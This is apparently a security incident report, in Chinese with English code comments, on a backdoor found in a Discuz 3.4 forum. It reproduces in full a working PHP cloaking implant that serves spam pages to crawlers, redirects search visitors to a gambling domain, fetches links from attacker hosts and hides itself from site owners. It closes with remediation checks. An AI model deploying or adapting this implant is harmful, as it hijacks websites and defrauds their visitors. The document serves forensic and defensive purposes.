Discuz 3.4 漏洞利用报告：网站后门木马文件案例——彩票黑链/友情链接黑链注入（搜索引擎 Cloaking 劫持）脚本：
引入位置：
/static/space/t2/images/ 目录下伪装成 *.txt 的文件——其中 app.txt 被当作 PHP 直接 include 执行，moban.txt 等作为模板/变量文件被读取后做占位符替换（下方样本中的常量即指向这些文件）
图片:阿里云监控.jpg
案例黑链注入代码（样本按原样保留、仅添加分析注释；切勿部署或复用，其中的域名均为入侵指标 IoC）：
<?php
// NOTE(review): captured malware sample (search-engine cloaking / "black link" injector found under a
// Discuz 3.4 install). Reproduced byte-for-byte as forensic evidence; only comments were added.
// Do not deploy or "fix" it. The hard-coded hosts below are indicators of compromise.
// Hide every PHP error so the implant never leaks a warning into a page a crawler or visitor sees.
ini_set('html_errors',false);
ini_set('display_errors',false);
define(\"APP_INCLUDE_FLAG\",\"TRUE\");
define('APP_JACK_CHARSET','GBK');
header(\"Content-type: text/html; charset=\".APP_JACK_CHARSET);
// All payload files live in the forum's static image directory, disguised as .txt files.
define('APP_JACK_DOCUMENTROOT','/home/wwwroot/discuz/domain/discuz.net/web/static/space/t2/images/');
// Remote list of links to inject into templates (IoC: www.wlbxsjs.com); fetched at request time by replaceMyLink().
define('MY_LINK_URL', 'http://www.wlbxsjs.com/l.txt');
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
// Both branches define identical paths, so the Sogou test is currently a no-op
// (presumably a leftover from a variant with per-engine keyword/template files).
if (stristr($userAgent,\"sogou\")){
define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'zi.txt');
define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'moban.txt');
define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'bianliang.txt');
}
else
{
// zi.txt = keywords, moban.txt = page template (the only one read by this file), bianliang.txt = template variables.
define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'zi.txt');
define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'moban.txt');
define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'bianliang.txt');
}
// The constants below (article text, description, extra variable files, mixed keywords, cache flag,
// paragraph/sentence bounds) are not referenced anywhere in this file; presumably they are consumed
// by the included app.txt payload -- confirm by inspecting that file.
define('APP_JACK_ARTICLE',APP_JACK_DOCUMENTROOT.'wen.txt');
define('APP_JACK_DES',APP_JACK_DOCUMENTROOT.'miaoshu.txt');
define('APP_JACK_BIANLIANG_B',APP_JACK_DOCUMENTROOT.'bianliang2.txt');
define('APP_JACK_BIANLIANG_C',APP_JACK_DOCUMENTROOT.'bianliang3.txt');
define('APP_MIX_KWD_FILE',APP_JACK_DOCUMENTROOT.'hunhe.txt');
define('APP_JACK_CACHED','Uncached');
define('APP_JACK_MIN_PAR','3');
define('APP_JACK_MAX_PAR','3');
define('APP_JACK_MIN','10');
define('APP_JACK_MAX','15');
// app.txt is include()d as PHP by missclient::run(); the .txt extension is only camouflage.
define('APP_JACK_APPFILE',APP_JACK_DOCUMENTROOT.'app.txt');
// Fake Discuz thread URL with a random 8-10 digit id. Ids above 9999999 are exactly what
// missclient::run() treats as the trigger for serving the cloaked page, so these links feed the crawler
// URLs that will later hit the payload.
function App_GetLink(){
return 'http://www.discuz.net/thread-'.mt_rand(9999999,9999999999).'-1-1.html';
}
// Identical to App_GetLink(); presumably meant to be the "current page" URL inside templates, but it
// just returns another random fake thread URL.
function App_GetSelf(){
return 'http://www.discuz.net/thread-'.mt_rand(9999999,9999999999).'-1-1.html';
}
// Returns a random image URL from the attacker's host (IoC: link.wlbxsjs.com), for use in templates.
function getImg(){
return 'http://link.wlbxsjs.com/tupian/'.rand(1,7000).\".jpg\";
}
// Runs the cloaking engine on every request that includes this file. PHP hoists unconditional
// top-level class definitions, so instantiating missclient before its declaration below works.
$my_app = new missclient();
$my_app->run();
// NOTE(review): the cloaking engine of the implant. Search-engine crawlers get a generated spam page
// (or hidden links to it), humans arriving from a search engine get redirected to a gambling site,
// and everyone else -- including the site owner -- sees the untouched page. Code is unchanged from
// the captured sample; only comments were added.
class missclient{
public $show_spider;
// Referrer substrings that identify search engines (eligible for the Jump() redirect).
public $jump_ref;
// Referrer substrings (search operators) that identify someone investigating the site.
public $http_ref_filter;
public $jump_url = \"\";
public $domain = \"\";
public $condition = \"\";
public $app_server = \"\";
// Log path for crawler hits; left empty here, so isSpider() never writes a log.
public $log_spider = \"\";
// Key of the crawler signature that matched in isSpider().
public $cur_spider = \"\";
// Despite the name: IP prefixes that are EXCLUDED from every malicious behaviour (see isAllowdIp()).
public $allow_ip = \"\";
public $isCache = false;
// Entry point: choose the behaviour for this request from user-agent, referrer, client IP and ?tid.
public function run(){
$this->domain = $this->getServerName();
// Referrers treated as "came from a search engine".
$this->jump_ref = explode(\"|\",\"360.|haoso.|bing.|google.|sogou.|soso.|so.com|.sm.cn|.youdao|.yisou|.easou|.etao|.chinaso\");
// Referrers containing site:/inurl: suggest an analyst or webmaster; those are never redirected.
$this->http_ref_filter = explode(\"|\",\"inurl:|site:|site%3A|inurl%3A\");
// IP prefixes excluded from the attack (the operator's own or internal ranges, presumably).
$this->allow_ip = \"218.80.218.|10.4.62.|10.4.33\";
// Only the fake thread URLs produced by App_GetLink() (tid above 9999999) trigger the payload.
// $_GET['tid'] may be unset; the resulting notice is hidden by display_errors=false.
$this->condition = ($_GET['tid']> 9999999 && $this->isAllowdIp());
// Remote page generator (IoC: www.sohu999.com); only used by getPage(), which nothing in this file calls.
$this->app_server = \"http://www.sohu999.com/gbk/app.php\";
$this->isCache = False;
if($this->isSpider() && $this->isAllowdIp()){
if($this->condition){
if($this->isCache){
// Disk-cache branch, disabled above via isCache=false. Cache dir is /tmp/<last 6 hex chars of
// md5(host)>/ (C:/windows/temp/ on Windows), created world-writable; file name derives from md5 of
// the query string, so the path is predictable.
$relset_host = $this->getServerName();
$dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47);
$cacheFile = $dir.'sess_' . substr(md5(http_build_query($_GET)), 6);
if(!@file_exists($dir)){
mkdir($dir, 0777);
}
if(@file_exists($cacheFile) && @filesize ($cacheFile) > 32 ){
// coreAppCache::read() unserialize()s the file; with a 0777 directory and a predictable path, any
// local user able to write /tmp could plant a serialized object here (PHP object injection).
$var = coreAppCache::read($cacheFile);
$page = file_get_contents(APP_JACK_TEMPLATE);
// Fill {key} placeholders in the template with the cached values.
foreach($var as $key=>$v){
$flag = \"{\".$key.\"}\";
$page = str_replace($flag,$v,$page);
}
echo myReplace($page);
exit();
}
else
{
// Just include the APP file: app.txt is executed as PHP and its return value is the generated page.
$currentPage = include(APP_JACK_APPFILE);
if($currentPage && strlen($currentPage) > 32 && stristr($currentPage,\"</explode>\")){
// The page carries a base64/gzip/serialized variable map between <explode> tags.
$var = self::cut($currentPage,\"<explode>\",\"</explode>\");
$var = coreAppCache::decode($var);
$page = file_get_contents(APP_JACK_TEMPLATE);
foreach($var as $key=>$v){
$flag = \"{\".$key.\"}\";
$page = str_replace($flag,$v,$page);
}
echo myReplace($page);
@coreAppCache::writenocode($currentPage,$cacheFile);
}
}
die();
}
else
{
// Uncached path -- the active one in this sample: run app.txt, post-process, emit, and kill the
// real page with die().
$currentPage = include(APP_JACK_APPFILE);
echo myReplace($currentPage);
die();
}
}
else
{
// Crawler on an ordinary URL: seed it with hidden links to the fake thread URLs.
$this->_uncondition_hook();
}
}
else
{
// Human visitor: redirect only if they came from a search engine AND hit a fake thread URL.
// Everyone else gets the untouched page, which is what keeps the implant invisible to the owner.
if($this->isRef() && $this->condition){
$this->Jump();
}
else
{
$this->_unSpider_hook();
}
}
}
// Returns FALSE when the client IP contains any prefix from $allow_ip, TRUE otherwise -- i.e. the list
// is a deny list of IPs to leave alone, the opposite of what the name suggests.
public function isAllowdIp(){
$ip = $this->clientIp();
$non_list = explode(\"|\",$this->allow_ip);
foreach($non_list as $iplist){
if(@stristr($ip,$iplist)){
return false;
}
}
return true;
}
// Best-effort client IP. Trusts HTTP_CLIENT_IP and X-Forwarded-For before REMOTE_ADDR, so the
// exclusion list is trivially spoofable (a defender can set X-Forwarded-For to an excluded prefix to
// get the clean page, or the reverse to trigger the payload). The regex keeps the first 7-15 char run
// of digits/dots, IPv4 only; if no source is set, $onlineip is undefined and 'unknown' is returned.
public function clientIp(){
if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$onlineip = getenv('REMOTE_ADDR');
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
$onlineip = $_SERVER['REMOTE_ADDR'];
}
preg_match(\"/[\d\.]{7,15}/\", $onlineip, $onlineipmatches);
$onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';
unset($onlineipmatches);
return $onlineip;
}
// True when the user-agent contains one of the crawler signatures below (case-insensitive); records
// the matching key in $cur_spider. Note the duplicate 'Sogou' keys: in a PHP array literal the last
// value wins, so only 'Sogou web spider' is actually tested for Sogou. The break after return is
// unreachable. Any client can spoof one of these strings to see the cloaked page -- useful for triage.
public function isSpider(){
$bots = array(
'Google' => 'Googlebot',
'MSN' => 'MSNbot',
'Soso' => 'Sosospider',
'Youdao' => 'Youdaobot',
'Yodao' => 'Yodaobot',
'Yisou' => 'Yisouspider',
'Easou' => 'Easouspider',
'Etao' => 'Etaospider',
'Chinaso' => 'Chinasospider',
'Baidu' => 'Baiduspider',
'Sogou' => 'Sogou news Spider',
'Sogou' => 'Sogou orion spider',
'Sogou' => 'Sogou news Spider',
'Sogou' => 'Sogou blog',
'Sogou' => 'Sogou spider2',
'Sogou' => 'Sogou inst spider',
'Sogou' => 'Sogou web spider',
'Haoso' => 'haosouspider',
'360spider' => '360spider',
'bingbot' => 'bingbot'
);
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
foreach ($bots as $k => $v){
if (stristr($userAgent,$v)){
if(!empty($this->log_spider)){
@file_put_contents($this->log_spider,$v.\"->Visited \".$_SERVER['QUERY_STRING'].\"at: \".date(\"Y-m-d H:i:s\").\"\n\",FILE_APPEND);
}
$this->cur_spider = $k;
return true;
break;
}
}
return false;
}
// Decides whether a non-crawler visitor may be redirected. Returns false for anyone already carrying
// the "domain-filter-bypass" cookie, and plants that cookie (259200 s = 3 days) before returning false
// for excluded IPs and for referrers containing search operators -- so an investigator who found the
// page via site:/inurl: keeps seeing the clean page for three days. Returns true when the referrer
// contains a search-engine name; falls off the end (null, falsy) otherwise.
public function isRef(){
$ref = strtolower(@$_SERVER['HTTP_REFERER']);
if(isset($_COOKIE[\"domain-filter-bypass\"])){
return false;
}
if(!$this->isAllowdIp()){
setcookie(\"domain-filter-bypass\", \"lol\", time() + 259200);
return false;
}
foreach($this->http_ref_filter as $r){
$r = trim($r);
if(stristr($ref,$r)){
setcookie(\"domain-filter-bypass\", \"lol\", time() + 259200);
return false;
}
}
foreach($this->jump_ref as $r){
$r = trim($r);
if(stristr($ref,$r)){
return true;
}
}
}
// Lower-cased host name, falling back to HTTP_HOST. NOTE(review): the ternary is garbled in this
// listing (the ':$' between the two $_SERVER reads is missing) -- almost certainly an extraction
// artefact, kept as found. Also, strpos() is only truthy when 'http://' is NOT at offset 0, so a
// leading scheme is never actually stripped.
public function getServerName()
{
$ServerName = strtolower($_SERVER['SERVER_NAME']?$_SERVER['SERVER_NAME']
_SERVER['HTTP_HOST']);
if( strpos($ServerName,'http://') )
{
return str_replace('http://','',$ServerName);
}
return $ServerName;
}
// Builds the C2 request (victim domain, gid=199, crawler key, cache flag and the full local query
// string) and fetches a generated page from $app_server. Not called anywhere in this file; $cache is
// undefined when $isCache is false.
public function getPage(){
if($this->isCache){
$cache=\"cached\";
}
$url = $this->app_server.\"?domain=\".$this->domain.\"&gid=199&spider=\".$this->cur_spider.\"&cache=\".$cache.\"&localPar=\".http_build_query($_GET);
return $this->HttpVisit($url);
}
// Outbound HTTP GET with three fallbacks: cURL, file_get_contents with a stream context, then a raw
// fsockopen request. Every error is @-suppressed, so failures yield NULL or partial data. The fsockopen
// path returns the raw response including status line and headers. Outbound connections to the hosts
// in this file from the web server are the network-side indicator of this implant.
public function HttpVisit($weburl) {
$remote_data = NULL;
if (function_exists('curl_exec')) {
$curl = @curl_init();
@curl_setopt($curl, CURLOPT_URL, $weburl);
@curl_setopt($curl, CURLOPT_HEADER, 0);
@curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);
@curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$remote_data = @curl_exec($curl);
@curl_close($curl);
} else {
if (function_exists('stream_context_create')) {
$header_array = array('http' => array('method' => 'GET', 'timeout' => 30));
$http_header = @stream_context_create($header_array);
$remote_data = @file_get_contents($weburl, false, $http_header);
} else {
// Manual URL split: element 2 of the '/' split is host[:port]; the path is everything after it.
$temp_url = explode(\"/\", $weburl);
$new_url = $temp_url[2];
$http_port = 80;
$get_file = substr($weburl, strlen($new_url) + 7);
if (strstr($new_url, chr(58))) {
$s_var_array['td'] = explode(chr(58), $new_url);
$new_url = $s_var_array['td'][0];
$http_port = $s_var_array['td'][1];
}
$fsock_result = @fsockopen($new_url, $http_port);
@fputs($fsock_result, 'GET ' . $get_file . ' HTTP/1.1' . \"\r\n\" . 'Host:' . $new_url . \"\r\n\" . 'Connection:Close' . \"\r\n\r\n\");
while (!feof($fsock_result)) {
$remote_data .= fgets($fsock_result, 1024);
}
@fclose($fsock_result);
}
}
return $remote_data;
}
// Redirects the visitor to the gambling site (IoC: 958999a.com), tagging the request with the victim
// domain (dots replaced by underscores). The Sogou and Bing branches are redundant -- all three paths
// go to the same URL, presumably leftovers from per-engine landing pages -- and so are the isAllowdIp()
// checks, since run() only calls Jump() when $condition (which already includes that check) holds.
public function Jump(){
$ref = strtolower(@$_SERVER['HTTP_REFERER']);
if($this->isAllowdIp() && stristr($ref,\"sogou.\")){
$domain = str_replace(\".\",\"_\",$this->domain);
header('Location: https://958999a.com/?jpb_'.$domain);
exit;
}
$ref = strtolower(@$_SERVER['HTTP_REFERER']);
if($this->isAllowdIp() && stristr($ref,\"bing.\")){
$domain = str_replace(\".\",\"_\",$this->domain);
header('Location: https://958999a.com/?jpb_'.$domain);
exit;
}
if($this->isAllowdIp()){
$domain = str_replace(\".\",\"_\",$this->domain);
header('Location: https://958999a.com/?jpb_'.$domain);
exit;
}
}
// Crawler landed on a normal page: emit five empty anchors pointing at random fake thread URLs so the
// search engine discovers and indexes the cloaked pages. $array is unused.
public function _uncondition_hook(){
$array = array();
for($a=0;$a<5;$a++){
echo '<a href=\"'.App_GetLink().'\"></a>'.\"\n\";
}
}
// Human visitor, no redirect: deliberately does nothing, so the site owner sees nothing unusual.
public function _unSpider_hook(){
//
}
// Byte-wise prefix test. Unused in this file.
public function strStartWith($needle, $haystack){
return (substr($haystack, 0, strlen($needle))==$needle);
}
// Random lower-case alphanumeric string of $length chars, drawn with rand() (not a CSPRNG). Unused here.
public function rndStr($length=8){
$str = null;
$strPol = \"0123456789abcdefghijklmnopqrstuvwxyz\";
$max = strlen($strPol)-1;
for($i=0;$i<$length;$i++){
$str.=$strPol[rand(0,$max)];
}
return $str;
}
// Text between the first $from and the following $end. If $from is absent, $message[1] is undefined
// (notice hidden) and an empty string comes back.
public function cut($file,$from,$end)
{
$message=explode($from,$file);
$message=explode($end,$message[1]);
return $message[0];
}
}
// Cache codec for generated pages: serialize -> gzcompress -> base64 on write, the reverse on read.
// All methods are declared non-static yet are called statically from missclient; PHP 5/7 tolerate that
// with a (hidden) deprecation notice, PHP 8 throws -- the sample presumably targets an older PHP.
// decode() runs unserialize() on file content, so whoever can write the cache file (world-writable
// /tmp subdirectory, predictable name) gets PHP object injection.
class coreAppCache{
// Write cache: encode $file and store it at $filename.
public function write($file,$filename){
return file_put_contents($filename,self::encode($file));
}
// Store $file verbatim (used by run() to cache the raw app.txt output, <explode> tags included).
public function writenocode($file,$filename){
return file_put_contents($filename,$file);
}
// Read a cache file; if it carries <explode>...</explode>, only that inner section is decoded.
public function read($filename){
$content = file_get_contents($filename);
if(stristr($content,\"</explode>\")){
$content = self::cut($content,\"<explode>\",\"</explode>\");
}
return self::decode($content);
}
public function encode($file){
return base64_encode(gzcompress(serialize($file)));
}
// unserialize() of untrusted input -- see class note.
public function decode($file){
return unserialize(gzuncompress(base64_decode($file)));
}
// Same helper as missclient::cut(): text between the first $from and the following $end.
public function cut($file,$from,$end)
{
$message=explode($from,$file);
$message=explode($end,$message[1]);
return $message[0];
}
}
// Strips leading/trailing separators (\pZ), control characters (\p{Cc}) and a U+FEFF BOM from $str;
// the /u flag makes the pattern work on UTF-8 code points. Used to clean the downloaded link list.
function removeBom($str) {
$str = preg_replace('/^[\pZ\p{Cc}\x{feff}]+|[\pZ\p{Cc}\x{feff}]+$/ux', '', $str);
return $str;
}
// preg_replace_callback target for the friendly-link placeholders. On first use it downloads MY_LINK_URL
// once per request (static memo), splits the body into lines, trims them and drops empties; each
// placeholder is then replaced by one random entry. $str (the regex match) is ignored. If the download
// fails or is empty, array_rand() on an empty array raises a warning and the result is an undefined
// index -- both hidden by the ini_set() calls at the top.
function replaceMyLink($str) {
static $myLinks;
if (is_null($myLinks)) {
$c = new missclient();
$contents = removeBom($c->HttpVisit(MY_LINK_URL));
$contents = array_filter(array_map('trim', explode(PHP_EOL, $contents)));
$myLinks = $contents;
}
$linkIndex = array_rand($myLinks, 1);
$link = $myLinks[$linkIndex];
return $link;
}
// Replaces every {友情链接} / {友情链接N} ("friendly link") placeholder in $str with a remote link.
function myLinkHandler($str) {
return preg_replace_callback('#\{\s*友情链接\d*\s*\}#si', 'replaceMyLink', $str);
}
// Template post-processor. First swaps the friendly-link placeholders, then scans for <?= func(a,b) ?>
// tokens and replaces each (first occurrence only) with the result of calling func() with the
// comma-split arguments. Any global PHP function named in the template text (moban.txt or the output of
// app.txt) can be invoked this way, so those .txt files are the real payload and must be collected
// with the sample.
function myReplace($str) {
$str = myLinkHandler($str);
preg_match_all('#<\?=\s*([^\)]+)\(([^\)]+)\)\s*\?>#i', $str, $arr, PREG_SET_ORDER);
foreach ($arr as $item) {
if (isset($item[1], $item[2]) && function_exists($item[1])) {
$a = call_user_func_array($item[1], explode(',', $item[2]));
$str = str_replace_first($item[0], $a, $str);
}
}
return $str;
}
// Replaces the first occurrence of $from in $subject. Two quirks: preg_quote() is told the delimiter
// is '/' while the pattern actually uses '@', so a '@' inside $from breaks the pattern; and $to is
// passed as a preg_replace replacement, so '$1'-style references and backslashes in it are interpreted
// rather than inserted literally.
function str_replace_first($from, $to, $subject)
{
$from = '@'.preg_quote($from, '/').'@si';
return preg_replace($from, $to, $subject, 1);
}
// Random digit string. $chars is 0-9 repeated three times; the shuffle() is pointless because each
// position is drawn with mt_rand() anyway. When $mLen is given, the length is chosen uniformly between
// min and max of ($len, $mLen). mt_rand() is not a CSPRNG. Unused in this file (presumably called from
// templates via myReplace()).
function randKey($len, $mLen = null)
{
$chars = array(
\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"
);
if ($mLen && $mLen > 0) {
$minLen = min($len, $mLen);
$maxLen = max($mLen, $len);
$lenArr = range($minLen, $maxLen);
$len = $lenArr[array_rand($lenArr)];
}
$charsLen = count($chars) - 1;
shuffle($chars);
$str = \"\";
for ($i=0; $i<$len; $i++)
{
$str .= $chars[mt_rand(0, $charsLen)];
}
return trim($str);
}
?>
该文件一旦被引入即可挂载黑链并劫持搜索流量，请站长引起重视。排查要点（均来自上述样本）：
1. 检查 /static/space/t2/images/ 下是否存在 zi.txt、moban.txt、bianliang.txt、bianliang2.txt、bianliang3.txt、wen.txt、miaoshu.txt、hunhe.txt、app.txt 等莫名 txt 文件；app.txt 实为 PHP 代码，moban.txt 模板中的 `<?= 函数名(参数) ?>` 会被 myReplace() 直接当作函数调用执行，需一并取证。
2. 全站搜索外联域名 wlbxsjs.com、link.wlbxsjs.com、sohu999.com、958999a.com，并检查服务器出站连接记录。
3. 检查 /tmp/（Windows 为 C:/windows/temp/）下名为 6 位十六进制、内含 sess_* 文件的目录（缓存分支留下的痕迹）。
4. 普通访客和站长本人看不到任何异常：复现时可伪造 Baiduspider 等 User-Agent 并访问 thread-xxxxxxxx-1-1.html（tid 大于 9999999），或带上搜索引擎 Referer；响应中出现 domain-filter-bypass Cookie 也是被感染的标志。
5. 样本本身需被某处 include 才会执行，还应排查被篡改的核心文件或 .htaccess/入口文件，并通过 Referer 含 site:/inurl: 时不触发这一特性理解为何在搜索引擎中查询时难以发现。